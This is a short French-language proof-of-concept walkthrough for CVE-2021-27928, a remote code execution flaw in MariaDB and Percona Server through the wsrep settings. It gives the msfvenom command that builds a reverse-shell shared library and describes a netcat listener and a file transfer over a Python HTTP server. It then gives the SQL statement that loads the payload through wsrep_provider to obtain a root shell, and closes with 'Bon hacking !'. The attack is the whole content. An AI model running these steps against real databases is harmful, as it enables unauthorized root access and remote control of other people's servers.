
CVE-2021-27928-POC
Un problème d'exécution de code à distance a été découvert dans MariaDB 10.2 avant 10.2.37, 10.3 avant 10.3.28, 10.4 avant 10.4.18 et 10.5 avant 10.5.9 ; Percona Server jusqu'au 2021-03-03 ; et le patch wsrep jusqu'au 2021-03-03 pour MySQL. Un chemin de recherche non fiable conduit à une injection eval, dans laquelle un utilisateur SUPER de la base de données peut exécuter des commandes OS après avoir modifié wsrep_provider et wsrep_notify_cmd. NOTE : cela n'affecte pas un produit Oracle.
Créons notre payload avec Msfvenom. Pour notre payload, nous utiliserons /linux/x64/shell_reverse_tcp avec notre IP pour LHOST et le numéro de PORT pour LPORT. Nous allons également spécifier le type de fichier avec -f qui dans notre cas est elf-so. Et nous enregistrerons le fichier de sortie sous CVE-2021.27928.so avec l'option -o.
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so

Notre payload est prêt ! Configurons netcat en écoute sur notre port spécifié.
Déplaçons notre fichier vers la machine cible. Pour cela, nous pouvons utiliser n'importe quelle méthode que nous préférons. J'utiliserai un serveur http python.

Sauvegardons le fichier dans le répertoire /tmp

Maintenant, nous devons nous connecter à la base de données et définir wsrep_provider sur notre payload téléchargé.
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

Il est temps de vérifier notre écouteur. Si nous avons réussi, nous devrions avoir obtenu un shell root sur la machine !

Bon hacking !